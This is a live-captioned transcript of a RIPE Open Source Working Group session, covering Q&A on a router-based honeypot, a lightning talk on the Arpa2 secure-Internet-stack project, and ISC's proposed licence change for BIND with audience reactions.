So, what are the potentials for cooperation? One of the things is that if you are running your own honeypot, it might be interesting to get together and work on it together, to improve it, because you constantly have to improve the simulation. Also, it might be interesting for you, for your own users to install this honeypot as a service, central server and offer it to them. But what we would be mostly interested is would be in creating some kind of, let's say, federated system where it would be possible to run these honeypots around the world and combine the data together, maybe even have some central point where the users can log in and so on, so that it would be really easy for them, and the more data we gather, the better, so if you are interested in this technology, if you would be interested in running such a honeypot, please let me know. We are just starting opening this up, starting to work on it, so the sooner we get feedback, the more we can make it so that it's interesting for others.

So this is everything from me. Thank you very much. I'm hoping for some talk about this later from interested parties.

ONDREJ FILIP: Thank you very much. We have time for a few questions.

AUDIENCE SPEAKER: Peter Hessler talking for myself. I currently run a system to distribute IP addresses that show certain characteristics so I would like to talk to you off line about possibly integrating the data you're seeing about the attackers with the system that I'm running.

AUDIENCE SPEAKER: Ben Yurian from Sweden. The man in the middle proxy, is it a possible DDoS point to the server, if you find out?

SPEAKER: Yes. It is possible. What we do is we ‑‑ our limiting the amount of, number of connections that can come to the centre server so that it doesn't go over some traffic we know that we are able to handle. So sometimes, the attacker cannot get into the machine, it looks like that it's unreachable or something like this. So, that's not a problem. So we are aware of it and we have some mitigation for this.

AUDIENCE SPEAKER: Lovely work. It is awesome and I'm going to enable this on my Turis later. I like the open data idea but I'm a bit worried about publishing IP addresses of compromised hosts so I hope you'll take good care of that.

SPEAKER: Yeah, that's its problem and this is something, especially now that the IP address is officially personal data, we would have ‑‑ we should take care of this and this is for the future work. But I think the data might be interesting even if it's not really specific IP addresses, it might be just, I don't know, /4 or something, but it still might be interesting for some researchers.

AUDIENCE SPEAKER: Oh definitely. And are you all right ‑‑ are you only collecting data right now or are you also working with abuse groups yet to try and take down the command and control centres or anything.

SPEAKER: We are directly connected to the national research team and we are to bring this data to them so that we can somehow cooperate. We tried to contact some of the ISPs where we have seen larger, like, BotNets, but yeah we mostly do it through the CSIRT team and we also use the data to protect tour Turis users by warning them if there is maybe some ‑‑ if they really ‑‑ these address that is we see there as attackers, if somebody talks to them back, not from the honeypot but from somewhere else, then we know that there may be a problem somewhere, we have found an open some buffering for instance in this way that someone was just sending data from Samba to an IP address in Albania, that was an attacker we have seen, so this is also another use of the data.

AUDIENCE SPEAKER: My name is Carlos, I come from LACNIC, certainly your fears about fears coming from Argentina IPs certainly got my attention. Just a comment, I would like to have a word with you because I can have contacts in Telefonica in order to get them this data. And also, I was wondering whether you can integrate data fields from other sources because I don't have a Turis box but I would like very much to contribute data. In fact I am collecting data using tools created by cert .br which certainly do a similar thing which you are doing here, and I would really like to contribute somehow.

BENDRICH KOSATA: We currently don't use other data for this. Rather, we use the data from the honeypot and integrate them into another system that we are right now building. It is one of the sources of data that we use in a different system. But it might be interesting to, for us to have a different source of data as well from you. So, let's talk about it later.

ONDREJ FILIP: Thank you very much. And now we have time for two lightning talks, we have like each eight minutes for each. First is Sarah Dickenson.


SARAH DICKENSON: So, my name is Sarah Dickenson what I'm going to talk about is the Arpa 2 project. This is a project I have only recently become involved with but I think it's reaching an interesting stage and it's the right time to start raising awareness of this in the wider community. It's the brainchild of two people. Michael Lenas and rip van Ryan. They have been blogging for quite sometime about their thoughts on where the Internet is, where it could be and where it should be. And their ideas about the philosophy behind this are on the Internet wide dot org website. They have a blog there, if you want and in‑depth view into the philosophy behind the project I encourage you to read the blog on that website.

The Arpa 2 project is the concrete project that has emergeed from their thinking on this and is now underway. So I'll try and touch a little bit on both sides of this.

So, where they started with their problems description was thinking about where the Internet is today, what it offers and specifically what it offers end users. So, as we know, the Internet is made up of many domain names, main service providers, many resellers, but what's true is that for a large swathe of the service providers, they are providing large equivalent services using largely equivalent architectures and tools. And so a lot of end end users that means they get web access and they get e‑mail. (To)

In that landscape, you have market forces, which can lead to pricing wars where it's about who can do things cheaper rather than better. And service providers are very aware that introducing new services involves both cost and risk, and this can be a real deterrent to the evolution of the offerings that they have.

There's also obviously platform walls. Now, everybody in this room is an Open Source supporter, but sometimes some of the business models associated with Open Sources are not as clear as they are foreclosed profitable platforms. And also a very important issue today in the Internet is that, the ownership of user identity is a very powerful thing and that's not just politically relevant, but it's also now become much much more of a legal issue.

So, the vision behind the Internet wide dot org philosophy is they want to move from where we are now to a decentralised Internet that is designed with both security and privacy as first principles in the design. And the way they see this happening is that they want to provide a ready made future Internet stack that can be used by those hosting providers to move forward in their service offerings. But it should use existing technologies, standards and proven deployed software. And the goal would really be you can then provide the whole range of essential Internet services in a distributed and trustworthy manner.

So, to think a bit more about what you have to do to produce a solution for that. Firstly, it really has to be a drop in replacement or else it just isn't going to get adopted.

Secondly, it has to meet the real world needs of those providers. Again they just won't pick it up if it doesn't do that.

It has also has to be user friendly or that in itself would be a barrier to deployment and adoption.

Another important consideration is that those providers are operating in a market where there are very, very small margins, so you can't require an investment in either new technology or a huge amount of new technology from the people operating that.

So, the way to go is to use standards based, open platforms, and use best practices as part of that and the technologies that we have been hearing about all week, DNSSEC and IPv6.

So, the project itself, the key players in it are NL net foundation, who are an Open Source foundation based in the Netherlands. Also, open fortress, which is an organisation involved in networking and CRYPT to go fee. And Internet wide is. We currently have a team of 8 developers, some full‑time some part time working on this. The overall project is going to be flit into four faces: Security hub is the phase which is currently underway. And this will be followed by identity hub, plug inhub and social hub. Unfortunately today I don't have time to go into too many details of the other stages, I'll concentrate on security hub, again there's much more information on the website.

So to delve into a little bit more about what's being implemented in this phase. Secure Hub uses technologies of TLS, DANE, L dab and kerb Ross, the way that's being coordinated is by three components. First of all there is a TLS pool and that's a central management point for TLS connections for all the applications on an end point.

Secondly, to enable that there's work on TLS KDH, which is a combination of kerb Ross, difficult‑hell man and TLS and thirdly steam works is a framework for the distribution of the configuration for the required for this.

Very briefly. TLS pool. It's a demon that runs on the client, and it manges not only the TLS connections but also the credentials for all the TLS connections that will come out of this box.

So essentially, an application can hand over, for example, an unencrypted file descriptor to the TLS demon and the TLS demon will apply a policy and retrieve credentials and hand back an encrypted connection. It removes the requirement of the application to have all that level of knowledge in it and it also provides a central place for the policy and for credentials management.

To support this, steam works is a framework made up of three components. Crank is the entry point for the TLS policy and there can be many of these distributed over many systems.

Shaft is the component that can then combined those policies into a single coherent picture.

And the pulley component will pull that policy down and deliver it into the TLS pool on the machine.

Finally, a little bit more about TLS K D H. So the goal here was to combine the best ideas related to doing both authentication, user authentication and encryption here. There is a draft which is going through the IETF which is very worthy while read, and it builds on a lot of earlier ideas but this draft again seems to be getting traction, and we currently have an implementation, a patch will be offered to do you new TLS shortly to implement this.

So, to wrap up Phase One is underway. The target for the deliverables for this is July 1st. It's going to be supported both on Linux and on Windows and the code will all be available in GitHub. Once that's complete we'll move on to looking at fades 2 which is the identity hub and identity management work. If you are interested, please either grab me after this session or there is a mailing list that's just been set up for interested parties. So feel free to discuss that or bring it to me after the session. That's severing I have got. Thanks very much.

ONDREJ FILIP: Thanks very much, Sara. We have time for like one or two brief questions, so if you have any questions, please go to the mike. We have one.

AUDIENCE SPEAKER: Hi. Shane Kerr. This is interesting. I'm not ‑‑ I guess I'm a little confused about the architecture, so, this is intended to run in hosting environments, right?

SPEAKER: There is going to be the client and service side. Yes.

SHANE KERR: Where are the clients intended? Are these just for like regular clients ‑‑

SPEAKER: Yes, so we're going to package it for end user use. So you can pick it up.

SHANE KERR: That's good.

ONDREJ FILIP: The last speaker is Geoff Osbourne, he chose in the open source route quite a good topic, which is licensing, so thank you very much for raising this up and we'll know something more about BIND licensing in a short while.

SPEAKER: I should know more than to get between a group and lunch time but they have been feeding us enough snacks I don't think that's really valid.

A lot of people today and throughout the week have been talking about Open Source as a business, and the challenges of funding it. I run ISC, my name is Geoff Osbourne and for several decades ISC has been funding itself through a variety of mechanisms, currently mostly through licensing, BIND and D PCP. We made change with our new groundup DHCP product in January and we lease it had under the MP L2.0 Mozilla licence and it started us thinking about the licensing a BIND which has been under, it's actually an ISC licence that we wrote, it looks a lot like the BSD licence, very permissive and started thinking about changing for BIND with our new release in the fall.

So, we have had a series of discussions internally and, through a combination of the mistake of the calendar and the fact that BIND probably has the greatest number of supporting customers and partners for us anywhere in the world, we decided to make this public that we were discussing this. I put the slides together fast because it was lightening and I realised I don't have the term, we are considering" and rather it says "We are" so I need to make clear that while this has been discussed internally with the board of directors, this that is been discussed internally with our employees and last week we talked about it with some of our larger customers, this is its beginning of a public discussion about does this make sense?

I have been around the Open Source wars for long enough that I can remember when I would have gotten rocks and tomatoes and pitch forks thrown for us bringing any of this up. The discussion to date has been remarkably civil and we markably positive. So, I'm going to be hopeful it will continue to be both. But what we're looking for from the community is input on just about any aspect of this. This is something we would do in the fall if we did it at all.

The hard thing is you can get into an argument about which licence means what because there are may too many Open Source licences already until you try to find one which specifically does what you want which explains why you have to write another one. So we're caught in that back and forthright now, but rather than say here is the licence we have chosen and here why the intentions are wrong, I want to explain what are intentions are.

We estimate, although it's hard to say, we don't have a phone home in the code or anything, we estimate we have about a million users of BIND and we foe for a fact we have about 100 paying customers, so that's four zeros different than somebody like oracle has between the number of users and the number of payers, so, I would argue that to go after those million users would be morally and ethically wrong, indefensible, stupid and a bunch of other things. But, I think there are another dozen or two users of BIND who simply are changing the code for commercial benefit and then not giving the code back to the community, or, offering us some kind of compensation for that in the form of an exception licence. And that's something that in the free software world has been a widely considered a good idea for decades, so I don't think we're doing anything radical here, but, again, I'm offering it up for input from the community of users that you represent.

Again, this is not making something commercial that was previously Open Source. It's still Open Source. We're just hoping to charge for the excepting for people who refuse to put it back into the community. And speaking of community input, Joao.

AUDIENCE SPEAKER: Well the original IC licence was good for its purpose when it needed to be that way. I mean, when the goal was to kind of preempt the development of proprietary non standard DNS software. Having something like the SC licence actually achieved the goal of keeping the DNS one and only and sticking to the standard right, otherwise we would probably have fallen victim of extended em embrace schemes. What people perhaps didn't realise is doing it that way required a substantial amount of funding to be able to carry on the process when there was no guaranteed return at all, because you are just giving it away with no conditions at all. Since that time, I believe everything has evolved, there are more Open Source implementations now, there's more people contributing this idea of keeping DNS 1 and 2, and it is much harder also to get funding these days. So, I have a change like this makes perfect sense in this day and age and I think BIND will still be able to achieve its goals.

SPEAKER: Thanks for the vote of confidence Joao.

AUDIENCE SPEAKER: Benno. NLnet Labs, just thank you for bringing this discussion in the room. NL labs is in a similar situation, we love the permissive licence at BSD but we also need some funding, some compensation for, to invest and maintain our code. Again, we love our permissive licence. But also we have to consider, for example, protection and BSD doesn't seem to be a Proxy‑Arp licence for that. But protection kind of, a poison pill constructions for parent hoods for example, or automatic licence assignment ‑‑ sorry automatic property transfer with contributions. So, again, we are also considering our position. We don't have ‑‑ this is an ongoing discussion. We also reviewing our Open Source licence scheme, but it's good, so I don't have an answer but it's good to have this discussion here in the group. And I'd love to talk with you and with the other community about these challenges we are facing.

ONDREJ FILIP: I'm sorry, I have to cut the discussion a little bit because we are running over time. Just a few words, we are almost exclusively using G N U licence, we don't have such problems because we really hardly stick with G N U and I understand your problems. And maybe G N U is the reason you have much higher number of payers compared to the users, so our ratio is much better than yours. So it's a little bit better when we use this very restrictive licence actually. So ‑‑ two brief comments and we have to finish the discussion.

Maybe that's a good topic for the next Open Source Working Group. We can extend this issue because it seems to be very interesting for the developers. So...

AUDIENCE SPEAKER: Shane Kerr. I fully support this change. So, a GPL style licence like this, anything that requires the people contribute changes back is a grade idea. Especially in DNS, I have talk talked to many people who explain the awesome things that their proprietary forks at BIND do and it makes me very sad that they will never see the light of day so this is a great way not only to help ISC be more sustainable and be able to do more things, but also just to help the code itself.

AUDIENCE SPEAKER: Peter Hessler from open BSD. We are, our primary licence template is the ISC licence and we very strongly like it. We have zero intention of changing away from that and it is a requirement for software to be included in open BSD that it has to be under an ICS or IMTO BSD licence. With consider that Mozilla or GTl or anything like that is is unacceptable for licensing within our project, so even thoughier no longer including BIND within it, we would be unable to upgrade from a pre‑or up to 9.11 if this licence change would happen. So, just as a possible disagreement from the perspective of the community.

ONDREJ FILIP: Thank you for that comment.

GEOFF OSBOURNE: Let me just say, one of the hard things about this is you want to talk to everyone in advance and you can't. So it's difficult to announce something having previously talked to everybody. So, the physics got in the way but I would have to have a discussion before we go. I am here through tomorrow.

ONDREJ FILIP: Thank you very much for bringing this topic. Thank you.

MARTIN WINTER: Okay. That's the end of the session today. I just want to remind before the next RIPE meeting there will be open slots for like election. If you want to replace one of us, if you want to become an additional Working Group Chair, the window opens I believe about two months before the next RIPE meeting. There will be an announcement on the list. You can start thinking about this if you think you can do better or want to help us out.

ONDREJ FILIP: We have to thank the thank the scribes and the stenographer. Thank you very much for the marvellous work. See you at the next RIPE meeting.

(Lunch break)